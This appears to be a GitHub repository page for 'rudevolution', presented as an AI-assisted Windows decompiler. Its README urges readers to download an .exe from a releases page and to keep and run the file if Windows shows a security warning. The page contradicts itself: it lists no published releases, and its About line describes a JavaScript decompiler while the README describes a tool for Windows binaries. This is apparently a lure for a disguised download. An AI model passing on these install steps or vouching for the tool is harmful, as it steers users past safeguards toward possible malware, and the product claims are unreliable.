Skip to content

rubiadialectic874/rudevolution

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🛠️ rudevolution - Decompile with clear, trusted results

Download rudevolution

🧭 What rudevolution does

ruDevolution is a Windows app that helps you inspect compiled programs in a simple way. It reads code, rebuilds structure, and shows names that are easier to understand. It also tracks each change with a proof chain, so you can see how the result was built.

Use it when you want to open a program file and get a clearer view of what it does. It works best for people who want a guided decompiler with plain output and step-by-step recovery.

📥 Download

Visit the releases page and download the latest Windows file:

Download rudevolution from GitHub Releases

🪟 Install on Windows

  1. Open the release page.
  2. Find the latest Windows download.
  3. Download the .exe file or the Windows package from the release assets.
  4. If Windows shows a security prompt, choose the option to keep the file.
  5. Double-click the downloaded file to start rudevolution.
  6. If the app opens in a zipped folder, extract it first, then run the program from the extracted folder.
  7. If Windows asks for permission, choose Yes.

🚀 First run

When rudevolution opens, you can load a file and start the analysis.

  1. Open the app.
  2. Choose the file you want to inspect.
  3. Let the app scan the file.
  4. Review the recovered names, structure, and notes.
  5. Check the witness chain to see how each step was built.

If you have used basic Windows apps before, this flow should feel familiar. Select a file, wait for the scan, then review the result.

🧩 What you can expect

  • Clear file loading for Windows users
  • Semantic analysis that focuses on meaning, not just raw text
  • Name recovery that helps turn vague labels into readable ones
  • AI-assisted hints that improve the output
  • Proof chains that show how the result was formed
  • Faster review on repeat runs as the app learns from prior work

🖥️ Windows system needs

rudevolution is built for modern Windows systems and runs best on:

  • Windows 10 or Windows 11
  • 8 GB RAM or more
  • A recent Intel or AMD processor
  • At least 500 MB of free disk space
  • A display with 1366 × 768 or higher

For larger files, more RAM helps the app keep scans smooth. A solid-state drive also improves load time.

📁 File types and use cases

rudevolution is meant for compiled software files and related binaries. It can help with:

  • Review of unknown executables
  • Inspection of program logic
  • Recovery of readable names
  • Comparison of repeated builds
  • Study of code structure after compilation

It is a good fit for users who want a calmer way to look inside a program without reading raw machine output.

🔍 How it works

The app follows a simple path:

  1. It reads the file.
  2. It builds a model of the program structure.
  3. It looks for patterns that point to original names.
  4. It uses AI to help fill gaps.
  5. It adds a witness chain for each major change.
  6. It stores what it learns so later runs can improve.

This gives you a result that is easier to inspect and trace.

🛠️ Common tasks

Open a file

Use the file picker in the app and choose the program you want to inspect.

Review recovered names

Look at labels, functions, and blocks that the app has renamed in a clearer way.

Check proof chains

Open the trace view to see how a result was created and which steps changed it.

Run again for better results

If you inspect a similar file later, rudevolution can use what it learned before.

❓ Tips for a smooth start

  • Keep the app in a folder you can find again.
  • Use a short file path, like C:\Tools\rudevolution.
  • Start with one small file before opening a large one.
  • Close other heavy apps if the scan feels slow.
  • Keep your Windows updates current.

📌 About the project

  • Repository: rudevolution
  • Topic focus: decompiler, claude-code, ruvector
  • Main goal: make decompilation easier to read and trust
  • Style: guided, traceable, and built for repeat use

About

Decompile JavaScript with AI, recover names, and verify each transform with cryptographic witness chains

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors